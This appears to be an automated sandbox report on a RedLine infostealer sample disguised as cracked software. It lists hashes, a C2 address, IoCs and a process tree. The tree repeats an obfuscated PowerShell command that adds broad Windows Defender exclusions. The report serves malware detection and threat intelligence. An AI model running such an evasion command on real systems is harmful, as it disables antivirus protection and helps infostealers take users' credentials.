redline | d4bae32272d4b78710e2546c787a5301135cdc3bbc89dde41fc32b5ff1b1374b

Analysis

max time kernel
24s
max time network
151s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
30-11-2024 18:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RogueV6.3cracked.exe
Size

13.6MB
MD5

ed475b5614b57bb769d9475bab408bb2
SHA1

a4496180da8930ea4b50f6b7e08e48cf4d093a43
SHA256

d4bae32272d4b78710e2546c787a5301135cdc3bbc89dde41fc32b5ff1b1374b
SHA512

88842132f2a486a34b4766d4b0092856fc3313895612f8aa613914acb5d32114ee033744c473b9ab28ec5f9f3e6e31980c85139f9f7dafdc4614b67f496403ce
SSDEEP

196608:/Qx1aFKgrjL4HwYJTPV+abRdGHMICWi0fNkn6zTetKvIy5nQmy:/Y1EDjL4QYJTQabRdGHvCWi0l6O+Kw

Score

10^/10

redline nou defense_evasion discovery infostealer

Malware Config

Extracted

Family

redline

Botnet

NOu

135.236.153.9:1912

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00080000000120fe-2.dat	family_redline
behavioral1/memory/1952-8-0x00000000008A0000-0x00000000008F2000-memory.dmp	family_redline

Redline family
redline

Executes dropped EXE 64 IoCs

pid	Process
1952	build (4).exe
2952	build (4).exe
2736	build (4).exe
2088	build (4).exe
2136	build (4).exe
2628	build (4).exe
2972	build (4).exe
2164	build (4).exe
1528	build (4).exe
1796	build (4).exe
868	build (4).exe
2812	build (4).exe
2128	build (4).exe
2784	build (4).exe
1724	build (4).exe
2336	build (4).exe
2912	build (4).exe
2428	build (4).exe
2744	build (4).exe
1732	build (4).exe
2804	build (4).exe
592	build (4).exe
2188	build (4).exe
2516	build (4).exe
2872	build (4).exe
1928	build (4).exe
2144	build (4).exe
2292	build (4).exe
1740	build (4).exe
2212	build (4).exe
3016	build (4).exe
1420	build (4).exe
1428	build (4).exe
1888	build (4).exe
2996	build (4).exe
2560	build (4).exe
928	build (4).exe
2680	build (4).exe
636	build (4).exe
2512	build (4).exe
2920	build (4).exe
1496	build (4).exe
2652	build (4).exe
1464	build (4).exe
2856	build (4).exe
2264	build (4).exe
2860	build (4).exe
944	build (4).exe
1148	build (4).exe
2460	build (4).exe
1576	build (4).exe
2768	build (4).exe
2456	build (4).exe
1964	build (4).exe
1396	build (4).exe
2792	build (4).exe
1544	build (4).exe
2524	build (4).exe
1536	build (4).exe
1760	build (4).exe
2056	build (4).exe
3180	build (4).exe
3328	build (4).exe
3444	build (4).exe

Loads dropped DLL 64 IoCs

pid	Process
2376	RogueV6.3cracked.exe
2924	RogueV6.3cracked.exe
2704	RogueV6.3cracked.exe
2984	RogueV6.3cracked.exe
2360	RogueV6.3cracked.exe
3012	RogueV6.3cracked.exe
1272	RogueV6.3cracked.exe
492	RogueV6.3cracked.exe
828	RogueV6.3cracked.exe
2020	RogueV6.3cracked.exe
2276	RogueV6.3cracked.exe
2512	RogueV6.3cracked.exe
2868	RogueV6.3cracked.exe
1656	RogueV6.3cracked.exe
1932	RogueV6.3cracked.exe
2188	RogueV6.3cracked.exe
1688	RogueV6.3cracked.exe
2872	RogueV6.3cracked.exe
1804	RogueV6.3cracked.exe
1160	RogueV6.3cracked.exe
2416	RogueV6.3cracked.exe
3020	RogueV6.3cracked.exe
2316	RogueV6.3cracked.exe
2448	RogueV6.3cracked.exe
2092	RogueV6.3cracked.exe
2832	RogueV6.3cracked.exe
2492	RogueV6.3cracked.exe
1972	RogueV6.3cracked.exe
2404	RogueV6.3cracked.exe
2652	RogueV6.3cracked.exe
2992	RogueV6.3cracked.exe
2208	RogueV6.3cracked.exe
1448	RogueV6.3cracked.exe
2140	RogueV6.3cracked.exe
1808	RogueV6.3cracked.exe
1416	RogueV6.3cracked.exe
2504	RogueV6.3cracked.exe
1912	RogueV6.3cracked.exe
3004	RogueV6.3cracked.exe
2056	RogueV6.3cracked.exe
2856	RogueV6.3cracked.exe
2668	RogueV6.3cracked.exe
1532	RogueV6.3cracked.exe
760	RogueV6.3cracked.exe
1576	RogueV6.3cracked.exe
1660	RogueV6.3cracked.exe
1736	RogueV6.3cracked.exe
2968	RogueV6.3cracked.exe
2112	RogueV6.3cracked.exe
2676	RogueV6.3cracked.exe
1780	RogueV6.3cracked.exe
2236	RogueV6.3cracked.exe
2944	RogueV6.3cracked.exe
2984	RogueV6.3cracked.exe
972	RogueV6.3cracked.exe
2056	RogueV6.3cracked.exe
1780	RogueV6.3cracked.exe
1940	RogueV6.3cracked.exe
1520	RogueV6.3cracked.exe
2284	RogueV6.3cracked.exe
2140	RogueV6.3cracked.exe
1520	RogueV6.3cracked.exe
3204	RogueV6.3cracked.exe
3348	RogueV6.3cracked.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
11084	10976	WerFault.exe	1245

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RogueV6.3cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build (4).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2880	powershell.exe
2912	powershell.exe
2744	powershell.exe
2848	powershell.exe
2352	powershell.exe
2412	powershell.exe
2388	powershell.exe
2140	powershell.exe
2444	powershell.exe
1736	powershell.exe
2304	powershell.exe
592	powershell.exe
2092	powershell.exe
2084	powershell.exe
1468	powershell.exe
2380	powershell.exe
2132	powershell.exe
2220	powershell.exe
2652	powershell.exe
1568	powershell.exe
636	powershell.exe
1224	powershell.exe
1608	powershell.exe
2228	powershell.exe
272	powershell.exe
2692	powershell.exe
2524	powershell.exe
1624	powershell.exe
2360	powershell.exe
1896	powershell.exe
636	powershell.exe
944	powershell.exe
1940	powershell.exe
1536	powershell.exe
2988	powershell.exe
2588	powershell.exe
2272	powershell.exe
2260	powershell.exe
1072	powershell.exe
948	powershell.exe
2408	powershell.exe
2504	powershell.exe
2380	powershell.exe
1536	powershell.exe
764	powershell.exe
2864	powershell.exe
1100	powershell.exe
2508	powershell.exe
1804	powershell.exe
2116	powershell.exe
2376	powershell.exe
2840	powershell.exe
272	powershell.exe
2092	powershell.exe
2236	powershell.exe
2216	powershell.exe
2260	powershell.exe
2668	powershell.exe
2092	powershell.exe
2540	powershell.exe
896	powershell.exe
3136	powershell.exe
3264	powershell.exe
3412	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	592	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	272	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	764	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	272	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	896	powershell.exe
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeDebugPrivilege	3412	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2376 wrote to memory of 2880	2376	RogueV6.3cracked.exe	30
PID 2376 wrote to memory of 2880	2376	RogueV6.3cracked.exe	30
PID 2376 wrote to memory of 2880	2376	RogueV6.3cracked.exe	30
PID 2376 wrote to memory of 2880	2376	RogueV6.3cracked.exe	30
PID 2376 wrote to memory of 1952	2376	RogueV6.3cracked.exe	32
PID 2376 wrote to memory of 1952	2376	RogueV6.3cracked.exe	32
PID 2376 wrote to memory of 1952	2376	RogueV6.3cracked.exe	32
PID 2376 wrote to memory of 1952	2376	RogueV6.3cracked.exe	32
PID 2376 wrote to memory of 2924	2376	RogueV6.3cracked.exe	33
PID 2376 wrote to memory of 2924	2376	RogueV6.3cracked.exe	33
PID 2376 wrote to memory of 2924	2376	RogueV6.3cracked.exe	33
PID 2376 wrote to memory of 2924	2376	RogueV6.3cracked.exe	33
PID 2924 wrote to memory of 2848	2924	RogueV6.3cracked.exe	34
PID 2924 wrote to memory of 2848	2924	RogueV6.3cracked.exe	34
PID 2924 wrote to memory of 2848	2924	RogueV6.3cracked.exe	34
PID 2924 wrote to memory of 2848	2924	RogueV6.3cracked.exe	34
PID 2924 wrote to memory of 2952	2924	RogueV6.3cracked.exe	36
PID 2924 wrote to memory of 2952	2924	RogueV6.3cracked.exe	36
PID 2924 wrote to memory of 2952	2924	RogueV6.3cracked.exe	36
PID 2924 wrote to memory of 2952	2924	RogueV6.3cracked.exe	36
PID 2924 wrote to memory of 2704	2924	RogueV6.3cracked.exe	37
PID 2924 wrote to memory of 2704	2924	RogueV6.3cracked.exe	37
PID 2924 wrote to memory of 2704	2924	RogueV6.3cracked.exe	37
PID 2924 wrote to memory of 2704	2924	RogueV6.3cracked.exe	37
PID 2704 wrote to memory of 2912	2704	RogueV6.3cracked.exe	96
PID 2704 wrote to memory of 2912	2704	RogueV6.3cracked.exe	96
PID 2704 wrote to memory of 2912	2704	RogueV6.3cracked.exe	96
PID 2704 wrote to memory of 2912	2704	RogueV6.3cracked.exe	96
PID 2704 wrote to memory of 2736	2704	RogueV6.3cracked.exe	40
PID 2704 wrote to memory of 2736	2704	RogueV6.3cracked.exe	40
PID 2704 wrote to memory of 2736	2704	RogueV6.3cracked.exe	40
PID 2704 wrote to memory of 2736	2704	RogueV6.3cracked.exe	40
PID 2704 wrote to memory of 2984	2704	RogueV6.3cracked.exe	41
PID 2704 wrote to memory of 2984	2704	RogueV6.3cracked.exe	41
PID 2704 wrote to memory of 2984	2704	RogueV6.3cracked.exe	41
PID 2704 wrote to memory of 2984	2704	RogueV6.3cracked.exe	41
PID 2984 wrote to memory of 2744	2984	RogueV6.3cracked.exe	104
PID 2984 wrote to memory of 2744	2984	RogueV6.3cracked.exe	104
PID 2984 wrote to memory of 2744	2984	RogueV6.3cracked.exe	104
PID 2984 wrote to memory of 2744	2984	RogueV6.3cracked.exe	104
PID 2984 wrote to memory of 2088	2984	RogueV6.3cracked.exe	44
PID 2984 wrote to memory of 2088	2984	RogueV6.3cracked.exe	44
PID 2984 wrote to memory of 2088	2984	RogueV6.3cracked.exe	44
PID 2984 wrote to memory of 2088	2984	RogueV6.3cracked.exe	44
PID 2984 wrote to memory of 2360	2984	RogueV6.3cracked.exe	142
PID 2984 wrote to memory of 2360	2984	RogueV6.3cracked.exe	142
PID 2984 wrote to memory of 2360	2984	RogueV6.3cracked.exe	142
PID 2984 wrote to memory of 2360	2984	RogueV6.3cracked.exe	142
PID 2360 wrote to memory of 2352	2360	RogueV6.3cracked.exe	46
PID 2360 wrote to memory of 2352	2360	RogueV6.3cracked.exe	46
PID 2360 wrote to memory of 2352	2360	RogueV6.3cracked.exe	46
PID 2360 wrote to memory of 2352	2360	RogueV6.3cracked.exe	46
PID 2360 wrote to memory of 2136	2360	RogueV6.3cracked.exe	47
PID 2360 wrote to memory of 2136	2360	RogueV6.3cracked.exe	47
PID 2360 wrote to memory of 2136	2360	RogueV6.3cracked.exe	47
PID 2360 wrote to memory of 2136	2360	RogueV6.3cracked.exe	47
PID 2360 wrote to memory of 3012	2360	RogueV6.3cracked.exe	49
PID 2360 wrote to memory of 3012	2360	RogueV6.3cracked.exe	49
PID 2360 wrote to memory of 3012	2360	RogueV6.3cracked.exe	49
PID 2360 wrote to memory of 3012	2360	RogueV6.3cracked.exe	49
PID 3012 wrote to memory of 2412	3012	RogueV6.3cracked.exe	50
PID 3012 wrote to memory of 2412	3012	RogueV6.3cracked.exe	50
PID 3012 wrote to memory of 2412	3012	RogueV6.3cracked.exe	50
PID 3012 wrote to memory of 2412	3012	RogueV6.3cracked.exe	50

C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2376
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2880
- C:\Users\Admin\AppData\Local\Temp\build (4).exe
  "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1952
- C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
  "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2924
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2848
- - C:\Users\Admin\AppData\Local\Temp\build (4).exe
    "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
    3⤵
    - Executes dropped EXE
    PID:2952
- - C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
    "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2704
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2912
  - - C:\Users\Admin\AppData\Local\Temp\build (4).exe
      "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2736
  - - C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
      "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2984
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2744
    - - C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        5⤵
        Executes dropped EXE
        
        PID:2088
    - - C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2360
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2352
      - C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        6⤵
        Executes dropped EXE
        
        PID:2136
      - C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        6⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:3012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        7⤵
        Executes dropped EXE
        
        PID:2628
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        7⤵
        Loads dropped DLL
        
        PID:1272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
